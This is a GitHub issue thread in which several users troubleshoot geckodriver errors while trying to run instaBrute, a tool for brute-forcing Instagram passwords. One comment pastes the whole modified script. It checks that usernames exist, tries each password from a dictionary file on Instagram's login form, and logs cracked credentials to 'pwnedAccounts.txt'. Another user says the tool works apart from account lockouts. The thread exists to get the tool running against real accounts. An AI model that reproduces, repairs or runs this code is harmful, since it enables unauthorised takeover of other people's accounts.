### ISSUE TITLE
help i am getting this error code when running instabrute.py

### ISSUE THREAD

**Issue by damageddomain** [chinoogawa/instaBrute#30]
Using 1 seconds of delay
Traceback (most recent call last):
  File "instaBrute.py", line 142, in <module>
    main()
  File "instaBrute.py", line 132, in main
    driver = webdriver.Firefox(profile)
  File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/firefox/webdriver.py", line 135, in __init__
    self.service.start()
  File "/usr/local/lib/python2.7/dist-packages/selenium/webdriver/common/service.py", line 71, in start
    os.path.basename(self.path), self.start_error_message)
selenium.common.exceptions.WebDriverException: Message: 'geckodriver' executable needs to be in PATH. 

Exception AttributeError: "'Service' object has no attribute 'process'" in <bound method Service.__del__ of <selenium.webdriver.firefox.service.Service object at 0x7f6ffe234150>> ignored

please help!!1

**Comment by ecwebservices** [comment]
I am getting same code. Are you using Ubuntu?

**Comment by Deyelk** [comment]
same code and im on kali

**Comment by Deyelk** [comment]
wheres the dev

**Comment by Karim47** [comment]
I'm getting the same error bro,

**Comment by ecwebservices** [comment]
I'm on ubuntu 14.04 not kali.

**Comment by Karim47** [comment]
I'm using Kali

**Comment by ecwebservices** [comment]
Where @chinoogawa aka the dev? We need him most likely unless anyone knows what he's doing in the code REALLY WELL.

**Comment by ecwebservices** [comment]
The problem seems to also happen at [This Repo](https://github.com/mozilla/geckodriver/issues/90) after looking at the errors is part of it. I'm going to look into it.

**Comment by ecwebservices** [comment]
So before I fully begin, does anyone else here also know python, or are you all just guessing.

**Comment by Deyelk** [comment]
guessing tbh

**Comment by ecwebservices** [comment]
Ok well I'll look at the other repo to see if I can find an answer.

**Comment by XizoYT** [comment]
I believe this error has something to do with GeckoDriver not being in the right path or not installed at all. I'm working on a solution atm.

**Comment by ecwebservices** [comment]
Sounds good. If you need help, I'd be happy to contribute.

**Comment by susits** [comment]
I am using Windows 8.1 and getting the excactly same message. Looking forward to @XizoYT 's research to be ready...

**Comment by sshkrv** [comment]
how about

**Comment by sshkrv** [comment]
how about this:

1.Download geckodriver
2.Copy geckodriver in /usr/local/bin

**Comment by ShockvaWe** [comment]
i got same problem too (Linux Mint 18)

**Comment by ShockvaWe** [comment]
Got this error on windows 10 : Traceback (most recent call last):
  File "instaBrute.py", line 142, in <module>
    main()
  File "instaBrute.py", line 136, in main
    driver = webdriver.Firefox(profile)
  File "C:\Python27\lib\site-packages\selenium\webdriver\firefox\webdriver.py", line 140, in __init__
    self.service.start()
  File "C:\Python27\lib\site-packages\selenium\webdriver\common\service.py", line 81, in start
    os.path.basename(self.path), self.start_error_message)
selenium.common.exceptions.WebDriverException: Message: 'geckodriver' executable needs to be in PATH.

Exception AttributeError: "'Service' object has no attribute 'process'" in <bound method Service.__del__ of <selenium.webdriver.firefox.service.Service object at 0x00000000038FABA8>> ignored

**Comment by ShockvaWe** [comment]
And got this after installing geckodriver => selenium.common.exceptions.WebDriverException: Message: Expected browser binary location, but unable to find binary in default location, no 'moz:firefoxOptions.binary' capability provided, and no binary flag set on the command line

**Comment by sshkrv** [comment]
Install mozilla firefox

**Comment by ShockvaWe** [comment]
Mozilla Firefox is already installed , i changed code like this : `#!/bin/python
from mainLib import *
from time import sleep
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
#import simplejson as json
import sys
import optparse
from selenium import webdriver
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary

binary = FirefoxBinary('C:\Program Files (x86)\Mozilla Firefox\firefox.exe')
driver = webdriver.Firefox(firefox_binary=binary)
profile = webdriver.FirefoxProfile()
profile.set_preference("general.useragent.override", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.76 Safari/537.36")
driver = "reserved"

def userExists(username):
	try:
		driver.get("https://instagram.com/"+username)
		assert (("Page Not Found" or "no encontrada") not in driver.title)
	except AssertionError:
		print 'user: "%s" does not exist, trying with the next!' %username
		return 1
	except:
		'uknown error'
		
def login(user, password, delay):
	try:
		print 'Trying with password: ' + password
		elem = driver.find_element_by_name("username")
		elem.clear()
		elem.send_keys(user)
		elem = driver.find_element_by_name("password")
		elem.clear()
		elem.send_keys(password)  
		elem.send_keys(Keys.RETURN)
		sleep(delay)
		assert (("Login") in driver.title)
		#assert (("Your username or password was incorrect" or "son incorrectos.") not in driver.page_source)
		#if driver.current_url == 'https://www.instagram.com/':
		#	print 'Password correct!'
		#	print '%s' %password
		#else:
		#	print 'Wrong password'
	except AssertionError:
		print 'Access granted mother kaker!!' 
		print 'The password is: ' + password
		try:
			f = open('pwnedAccounts.txt','a')
		except:
			f = open('pwnedAccounts.txt','w')
		f.write('username:'+user+'\npassword:'+password+'\n')
		f.close()
		driver.delete_all_cookies()
		return 1
	except:
		print "\r Check your connection to the internet mother kaker\r"

def dictionaryAttack(usernames,passwords,delay):
	if str(type(usernames)) == "<type 'list'>":
		for username in usernames:
			if (userExists(username) == 1):
				continue
			driver.get("https://instagram.com/accounts/login/")
			sleep(delay * 7)
			print 'Trying with username: ' + username
			for password in passwords:
				if (login(username,password,delay) == 1):
					cj.clear()
					break
	else:
		if (userExists(usernames) == 1):
			return
		driver.get("https://instagram.com/accounts/login/")
		sleep(delay * 7)
		print 'Trying with username: ' + usernames
		for password in passwords:
			if (login(usernames,password,delay) == 1):
				break
def main():
	parser = optparse.OptionParser()
	parser.add_option('-f', '--file', action="store", dest="userfile", help="File containing valid usernames (one per line)", default=False)
	parser.add_option('-d', '--dictionary', action="store", dest="dictionary", help="File containing passwords", default=False)
	parser.add_option('-u', '--username', action="store", dest="username", help="A valid username", default=False)
	parser.add_option('-t', '--time', action="store", dest="delay", help="delay in seconds. Use this option based on your connection speed", default=True)
	options, args = parser.parse_args()

	global driver

	if (options.delay is None):
		delay = 2
	else:
		delay = int(options.delay)
	print 'Using %d seconds of delay' %delay 

	if ( (options.userfile == False) and (options.username == False) ) :
		print 'You have to set an username or a userfile'
		exit()
	if ( (options.userfile != False) and (options.username != False) ) :
		print 'You can\'t set both options at once.. choose between username or userfile'
		exit()
	if (options.dictionary == False):
		print 'You have to set a valid path for the passwords dictionary'
		exit()

	try:
		f = open(options.dictionary,'r')
		passwords = []
		
		while True:
			line = f.readline()
			if not line:
				break
			passwords.append(line.strip('\n'))
		f.close()
	except:
		print 'Check the path to the dictionary and try again'
		exit()
	
	if (options.userfile != False):
		try:
			f = open(options.userfile,'r')
			usernames = []
			
			while True:
				line = f.readline()
				if not line:
					break
				usernames.append(line.strip('\n'))
			f.close()
		except:
			print 'Check the path to the users file and try again'
			exit()
        	
        	driver = webdriver.Firefox(profile)
        	driver.implicitly_wait(30)
		dictionaryAttack(usernames,passwords,delay)
	else:
       		driver = webdriver.Firefox(profile)
	        driver.implicitly_wait(30)
		dictionaryAttack(options.username,passwords,delay)
	
	driver.close()
if __name__ == '__main__':
	main()
`

and now it gives this error : 
selenium.common.exceptions.WebDriverException: Message: Failed to start browser:
entity not found

im done with this shit i waste at least 2.5 hours with that ..

**Comment by ShockvaWe** [comment]
i changed code like this : https://ghostbin.com/paste/h3eb6
and it still gives this error : selenium.common.exceptions.WebDriverException: Message: Failed to start browser:
entity not found

Firefox is installed alreadyim not stupid.
İm done with this s*** , i waste at least 2.5 hours..

**Comment by Deyelk** [comment]
its working for me brute after a while it gives a lockout that needs work

**Comment by Yesssaag** [comment]
you need the webdriver in selenium but i'm not gonna explain that cause i'm too lazy
